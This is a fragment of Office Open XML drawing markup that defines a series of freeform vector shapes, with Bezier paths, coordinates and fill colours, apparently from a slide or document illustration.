                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59237187-03A4-4C6C-AFC0-A12795896A6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994" y="4708"/>
                  <a:ext cx="1594" cy="1150"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 659 w 675"/>
                    <a:gd name="T1" fmla="*/ 47 h 487"/>
                    <a:gd name="T2" fmla="*/ 570 w 675"/>
                    <a:gd name="T3" fmla="*/ 0 h 487"/>
                    <a:gd name="T4" fmla="*/ 0 w 675"/>
                    <a:gd name="T5" fmla="*/ 153 h 487"/>
                    <a:gd name="T6" fmla="*/ 63 w 675"/>
                    <a:gd name="T7" fmla="*/ 180 h 487"/>
                    <a:gd name="T8" fmla="*/ 90 w 675"/>
                    <a:gd name="T9" fmla="*/ 201 h 487"/>
                    <a:gd name="T10" fmla="*/ 90 w 675"/>
                    <a:gd name="T11" fmla="*/ 487 h 487"/>
                    <a:gd name="T12" fmla="*/ 659 w 675"/>
                    <a:gd name="T13" fmla="*/ 337 h 487"/>
                    <a:gd name="T14" fmla="*/ 659 w 675"/>
                    <a:gd name="T15" fmla="*/ 47 h 4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75" h="487">
                      <a:moveTo>
                        <a:pt x="659" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="644" y="26"/>
                        <a:pt x="581" y="4"/>
                        <a:pt x="570" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="153"/>
                        <a:pt x="0" y="153"/>
                        <a:pt x="0" y="153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="153"/>
                        <a:pt x="35" y="165"/>
                        <a:pt x="63" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="187"/>
                        <a:pt x="85" y="194"/>
                        <a:pt x="90" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="224"/>
                        <a:pt x="90" y="487"/>
                        <a:pt x="90" y="487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="659" y="337"/>
                        <a:pt x="659" y="337"/>
                        <a:pt x="659" y="337"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="659" y="337"/>
                        <a:pt x="675" y="71"/>
                        <a:pt x="659" y="4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26" name="Freeform 259">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47FB5EB-7BE3-46A3-A1EB-EBCD8095FBB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289" y="5204"/>
                  <a:ext cx="168" cy="220"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 220 h 220"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 220"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 220"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 175 h 220"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 220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8" h="220">
                      <a:moveTo>
                        <a:pt x="0" y="220"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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B7DBFF"/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Freeform 260">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B61C386-687C-4520-8A9A-53D8BBFA3E8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2321" y="4927"/>
                  <a:ext cx="168" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 218 h 218"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 218"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 218"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 173 h 218"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 218 h 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8" h="218">
                      <a:moveTo>
                        <a:pt x="0" y="218"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="21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B7DBFF"/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28" name="Freeform 261">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA35C056-F953-4C45-8330-C03A6D424F9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289" y="5445"/>
                  <a:ext cx="168" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 125 h 125"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 125"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 125"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 80 h 125"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 125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8" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="125"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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FFC269"/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29" name="Freeform 262">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F23CDA36-D881-4F75-B88E-89D17EF9108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2321" y="5166"/>
                  <a:ext cx="168" cy="128"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 128 h 128"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 128"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 128"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 83 h 128"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 128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8" h="128">
                      <a:moveTo>
                        <a:pt x="0" y="128"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="83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FFC269"/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30" name="Freeform 263">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61E16B47-5608-4389-AABC-39A4E4CE7E7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gray">
                <a:xfrm>
                  <a:off x="1542" y="4961"/>
                  <a:ext cx="678" cy="656"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 678"/>
                    <a:gd name="T1" fmla="*/ 186 h 656"/>
                    <a:gd name="T2" fmla="*/ 0 w 678"/>
                    <a:gd name="T3" fmla="*/ 394 h 656"/>
                    <a:gd name="T4" fmla="*/ 678 w 678"/>
                    <a:gd name="T5" fmla="*/ 212 h 656"/>
                    <a:gd name="T6" fmla="*/ 678 w 678"/>
                    <a:gd name="T7" fmla="*/ 0 h 656"/>
                    <a:gd name="T8" fmla="*/ 0 w 678"/>
                    <a:gd name="T9" fmla="*/ 186 h 656"/>
                    <a:gd name="T10" fmla="*/ 0 w 678"/>
                    <a:gd name="T11" fmla="*/ 656 h 656"/>
                    <a:gd name="T12" fmla="*/ 678 w 678"/>
                    <a:gd name="T13" fmla="*/ 470 h 656"/>
                    <a:gd name="T14" fmla="*/ 678 w 678"/>
                    <a:gd name="T15" fmla="*/ 278 h 656"/>
                    <a:gd name="T16" fmla="*/ 0 w 678"/>
                    <a:gd name="T17" fmla="*/ 460 h 656"/>
                    <a:gd name="T18" fmla="*/ 0 w 678"/>
                    <a:gd name="T19" fmla="*/ 656 h 6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78" h="656">
                      <a:moveTo>
                        <a:pt x="0" y="186"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="212"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="186"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="0" y="656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="678" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="460"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="65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Freeform 264">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6394CBB-AD8D-4EC9-ABD3-84A9581C304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076" y="5372"/>
                  <a:ext cx="1491" cy="534"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 630 w 631"/>
                    <a:gd name="T1" fmla="*/ 2 h 226"/>
                    <a:gd name="T2" fmla="*/ 627 w 631"/>
                    <a:gd name="T3" fmla="*/ 0 h 226"/>
                    <a:gd name="T4" fmla="*/ 627 w 631"/>
                    <a:gd name="T5" fmla="*/ 5 h 226"/>
                    <a:gd name="T6" fmla="*/ 434 w 631"/>
                    <a:gd name="T7" fmla="*/ 58 h 226"/>
                    <a:gd name="T8" fmla="*/ 234 w 631"/>
                    <a:gd name="T9" fmla="*/ 115 h 226"/>
                    <a:gd name="T10" fmla="*/ 0 w 631"/>
                    <a:gd name="T11" fmla="*/ 149 h 226"/>
                    <a:gd name="T12" fmla="*/ 0 w 631"/>
                    <a:gd name="T13" fmla="*/ 198 h 226"/>
                    <a:gd name="T14" fmla="*/ 234 w 631"/>
                    <a:gd name="T15" fmla="*/ 165 h 226"/>
                    <a:gd name="T16" fmla="*/ 434 w 631"/>
                    <a:gd name="T17" fmla="*/ 108 h 226"/>
                    <a:gd name="T18" fmla="*/ 610 w 631"/>
                    <a:gd name="T19" fmla="*/ 61 h 226"/>
                    <a:gd name="T20" fmla="*/ 610 w 631"/>
                    <a:gd name="T21" fmla="*/ 61 h 226"/>
                    <a:gd name="T22" fmla="*/ 610 w 631"/>
                    <a:gd name="T23" fmla="*/ 61 h 226"/>
                    <a:gd name="T24" fmla="*/ 627 w 631"/>
                    <a:gd name="T25" fmla="*/ 55 h 226"/>
                    <a:gd name="T26" fmla="*/ 630 w 631"/>
                    <a:gd name="T27" fmla="*/ 51 h 226"/>
                    <a:gd name="T28" fmla="*/ 630 w 631"/>
                    <a:gd name="T29" fmla="*/ 2 h 2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31" h="226">
                      <a:moveTo>
                        <a:pt x="630" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="630" y="1"/>
                        <a:pt x="629" y="0"/>
                        <a:pt x="627" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="627" y="5"/>
                        <a:pt x="627" y="5"/>
                        <a:pt x="627" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="604" y="16"/>
                        <a:pt x="492" y="42"/>
                        <a:pt x="434" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="374" y="75"/>
                        <a:pt x="289" y="99"/>
                        <a:pt x="234" y="115"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="131"/>
                        <a:pt x="39" y="174"/>
                        <a:pt x="0" y="149"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="198"/>
                        <a:pt x="0" y="198"/>
                        <a:pt x="0" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="226"/>
                        <a:pt x="178" y="181"/>
                        <a:pt x="234" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="289" y="149"/>
                        <a:pt x="374" y="125"/>
                        <a:pt x="434" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="483" y="94"/>
                        <a:pt x="570" y="74"/>
                        <a:pt x="610" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                        <a:pt x="610" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="616" y="59"/>
                        <a:pt x="627" y="55"/>
                        <a:pt x="627" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="629" y="53"/>
                        <a:pt x="631" y="52"/>
                        <a:pt x="630" y="51"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="630" y="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32" name="Freeform 265">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF328140-3F85-45C4-938A-892CB2F2F0C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552" y="4495"/>
                  <a:ext cx="165" cy="484"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 165"/>
                    <a:gd name="T1" fmla="*/ 484 h 484"/>
                    <a:gd name="T2" fmla="*/ 0 w 165"/>
                    <a:gd name="T3" fmla="*/ 45 h 484"/>
                    <a:gd name="T4" fmla="*/ 165 w 165"/>
                    <a:gd name="T5" fmla="*/ 0 h 484"/>
                    <a:gd name="T6" fmla="*/ 165 w 165"/>
                    <a:gd name="T7" fmla="*/ 440 h 484"/>
                    <a:gd name="T8" fmla="*/ 0 w 165"/>
                    <a:gd name="T9" fmla="*/ 484 h 4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5" h="484">
                      <a:moveTo>
                        <a:pt x="0" y="484"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165" y="44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33" name="Freeform 266">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C3B5918-619D-4B03-B32B-2033E6AC3E6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519" y="4533"/>
                  <a:ext cx="33" cy="446"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 33 w 33"/>
                    <a:gd name="T1" fmla="*/ 7 h 446"/>
                    <a:gd name="T2" fmla="*/ 0 w 33"/>
                    <a:gd name="T3" fmla="*/ 0 h 446"/>
                    <a:gd name="T4" fmla="*/ 0 w 33"/>
                    <a:gd name="T5" fmla="*/ 439 h 446"/>
                    <a:gd name="T6" fmla="*/ 33 w 33"/>
                    <a:gd name="T7" fmla="*/ 446 h 446"/>
                    <a:gd name="T8" fmla="*/ 33 w 33"/>
                    <a:gd name="T9" fmla="*/ 7 h 4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446">
                      <a:moveTo>
                        <a:pt x="33" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="439"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="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34" name="Freeform 267">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E669D849-5E52-4E36-9314-86641178B7E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519" y="4488"/>
                  <a:ext cx="198" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 198 w 198"/>
                    <a:gd name="T1" fmla="*/ 7 h 52"/>
                    <a:gd name="T2" fmla="*/ 168 w 198"/>
                    <a:gd name="T3" fmla="*/ 0 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 198"/>
                    <a:gd name="T5" fmla="*/ 45 h 52"/>
                    <a:gd name="T6" fmla="*/ 33 w 198"/>
                    <a:gd name="T7" fmla="*/ 52 h 52"/>
                    <a:gd name="T8" fmla="*/ 198 w 198"/>
                    <a:gd name="T9" fmla="*/ 7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8" h="52">
                      <a:moveTo>
                        <a:pt x="198" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="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35" name="Freeform 268">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F005F7E9-B70A-43BC-B8FC-B152C8CAFDD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746" y="5013"/>
                  <a:ext cx="26" cy="28"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 11"/>
                    <a:gd name="T1" fmla="*/ 11 h 12"/>
                    <a:gd name="T2" fmla="*/ 2 w 11"/>
                    <a:gd name="T3" fmla="*/ 8 h 12"/>
                    <a:gd name="T4" fmla="*/ 2 w 11"/>
                    <a:gd name="T5" fmla="*/ 1 h 12"/>
                    <a:gd name="T6" fmla="*/ 9 w 11"/>
                    <a:gd name="T7" fmla="*/ 3 h 12"/>
                    <a:gd name="T8" fmla="*/ 9 w 11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9" y="11"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="4" y="11"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="6"/>
                        <a:pt x="11" y="9"/>
                        <a:pt x="9" y="1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36" name="Freeform 269">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7557FC5-BE02-4D59-946D-46E5022AD33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746" y="4332"/>
                  <a:ext cx="26" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 11"/>
                    <a:gd name="T1" fmla="*/ 11 h 13"/>
                    <a:gd name="T2" fmla="*/ 2 w 11"/>
                    <a:gd name="T3" fmla="*/ 9 h 13"/>
                    <a:gd name="T4" fmla="*/ 2 w 11"/>
                    <a:gd name="T5" fmla="*/ 1 h 13"/>
                    <a:gd name="T6" fmla="*/ 9 w 11"/>
                    <a:gd name="T7" fmla="*/ 4 h 13"/>
                    <a:gd name="T8" fmla="*/ 9 w 11"/>
                    <a:gd name="T9" fmla="*/ 11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3">
                      <a:moveTo>
                        <a:pt x="9" y="11"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="13"/>
                        <a:pt x="4" y="12"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="9" y="1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37" name="Freeform 270">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF055B9-8A7F-4134-B28F-4AB05DED013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542" y="4339"/>
                  <a:ext cx="218" cy="756"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 92"/>
                    <a:gd name="T1" fmla="*/ 24 h 320"/>
                    <a:gd name="T2" fmla="*/ 0 w 92"/>
                    <a:gd name="T3" fmla="*/ 320 h 320"/>
                    <a:gd name="T4" fmla="*/ 92 w 92"/>
                    <a:gd name="T5" fmla="*/ 295 h 320"/>
                    <a:gd name="T6" fmla="*/ 90 w 92"/>
                    <a:gd name="T7" fmla="*/ 287 h 320"/>
                    <a:gd name="T8" fmla="*/ 8 w 92"/>
                    <a:gd name="T9" fmla="*/ 309 h 320"/>
                    <a:gd name="T10" fmla="*/ 8 w 92"/>
                    <a:gd name="T11" fmla="*/ 30 h 320"/>
                    <a:gd name="T12" fmla="*/ 92 w 92"/>
                    <a:gd name="T13" fmla="*/ 7 h 320"/>
                    <a:gd name="T14" fmla="*/ 90 w 92"/>
                    <a:gd name="T15" fmla="*/ 0 h 320"/>
                    <a:gd name="T16" fmla="*/ 0 w 92"/>
                    <a:gd name="T17" fmla="*/ 24 h 3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2" h="320">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="320"/>
                        <a:pt x="0" y="320"/>
                        <a:pt x="0" y="320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="295"/>
                        <a:pt x="92" y="295"/>
                        <a:pt x="92" y="295"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="287"/>
                        <a:pt x="90" y="287"/>
                        <a:pt x="90" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="287"/>
                        <a:pt x="17" y="307"/>
                        <a:pt x="8" y="309"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="299"/>
                        <a:pt x="8" y="36"/>
                        <a:pt x="8" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="29"/>
                        <a:pt x="92" y="7"/>
                        <a:pt x="92" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="0"/>
                        <a:pt x="90" y="0"/>
                        <a:pt x="90" y="0"/>
                      </a:cubicBez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38" name="Freeform 271">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E99EA9E-523E-4452-B5A6-4C1D57462C3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>
                  <a:off x="1476" y="4091"/>
                  <a:ext cx="236" cy="787"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 236 w 236"/>
                    <a:gd name="T1" fmla="*/ 787 h 787"/>
                    <a:gd name="T2" fmla="*/ 0 w 236"/>
                    <a:gd name="T3" fmla="*/ 0 h 787"/>
                    <a:gd name="T4" fmla="*/ 236 w 236"/>
                    <a:gd name="T5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36" h="787">
                      <a:moveTo>
                        <a:pt x="236" y="787"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="7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39" name="Line 272">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F17CCBB-E20A-4A7C-A0FE-71FF598FFD0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gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="1476" y="4091"/>
                  <a:ext cx="236" cy="78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98" name="Freeform 273">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD7BE3C-F653-4C63-A1F9-EE71CB5D49E3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837" y="3182"/>
                <a:ext cx="318" cy="306"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 109"/>
                  <a:gd name="T1" fmla="*/ 19 h 106"/>
                  <a:gd name="T2" fmla="*/ 14 w 109"/>
                  <a:gd name="T3" fmla="*/ 18 h 106"/>
                  <a:gd name="T4" fmla="*/ 13 w 109"/>
                  <a:gd name="T5" fmla="*/ 8 h 106"/>
                  <a:gd name="T6" fmla="*/ 9 w 109"/>
                  <a:gd name="T7" fmla="*/ 1 h 106"/>
                  <a:gd name="T8" fmla="*/ 18 w 109"/>
                  <a:gd name="T9" fmla="*/ 4 h 106"/>
                  <a:gd name="T10" fmla="*/ 24 w 109"/>
                  <a:gd name="T11" fmla="*/ 17 h 106"/>
                  <a:gd name="T12" fmla="*/ 30 w 109"/>
                  <a:gd name="T13" fmla="*/ 26 h 106"/>
                  <a:gd name="T14" fmla="*/ 33 w 109"/>
                  <a:gd name="T15" fmla="*/ 28 h 106"/>
                  <a:gd name="T16" fmla="*/ 85 w 109"/>
                  <a:gd name="T17" fmla="*/ 71 h 106"/>
                  <a:gd name="T18" fmla="*/ 95 w 109"/>
                  <a:gd name="T19" fmla="*/ 72 h 106"/>
                  <a:gd name="T20" fmla="*/ 104 w 109"/>
                  <a:gd name="T21" fmla="*/ 77 h 106"/>
                  <a:gd name="T22" fmla="*/ 109 w 109"/>
                  <a:gd name="T23" fmla="*/ 94 h 106"/>
                  <a:gd name="T24" fmla="*/ 102 w 109"/>
                  <a:gd name="T25" fmla="*/ 85 h 106"/>
                  <a:gd name="T26" fmla="*/ 93 w 109"/>
                  <a:gd name="T27" fmla="*/ 86 h 106"/>
                  <a:gd name="T28" fmla="*/ 94 w 109"/>
                  <a:gd name="T29" fmla="*/ 97 h 106"/>
                  <a:gd name="T30" fmla="*/ 99 w 109"/>
                  <a:gd name="T31" fmla="*/ 105 h 106"/>
                  <a:gd name="T32" fmla="*/ 89 w 109"/>
                  <a:gd name="T33" fmla="*/ 102 h 106"/>
                  <a:gd name="T34" fmla="*/ 82 w 109"/>
                  <a:gd name="T35" fmla="*/ 87 h 106"/>
                  <a:gd name="T36" fmla="*/ 76 w 109"/>
                  <a:gd name="T37" fmla="*/ 77 h 106"/>
                  <a:gd name="T38" fmla="*/ 21 w 109"/>
                  <a:gd name="T39" fmla="*/ 31 h 106"/>
                  <a:gd name="T40" fmla="*/ 13 w 109"/>
                  <a:gd name="T41" fmla="*/ 30 h 106"/>
                  <a:gd name="T42" fmla="*/ 5 w 109"/>
                  <a:gd name="T43" fmla="*/ 26 h 106"/>
                  <a:gd name="T44" fmla="*/ 0 w 109"/>
                  <a:gd name="T45" fmla="*/ 11 h 106"/>
                  <a:gd name="T46" fmla="*/ 6 w 109"/>
                  <a:gd name="T47" fmla="*/ 19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9" h="106">
                    <a:moveTo>
                      <a:pt x="6" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="20"/>
                      <a:pt x="11" y="23"/>
                      <a:pt x="14" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="12"/>
                      <a:pt x="14" y="9"/>
                      <a:pt x="13" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="7"/>
                      <a:pt x="9" y="2"/>
                      <a:pt x="9" y="1"/>
                    </a:cubicBezTo>
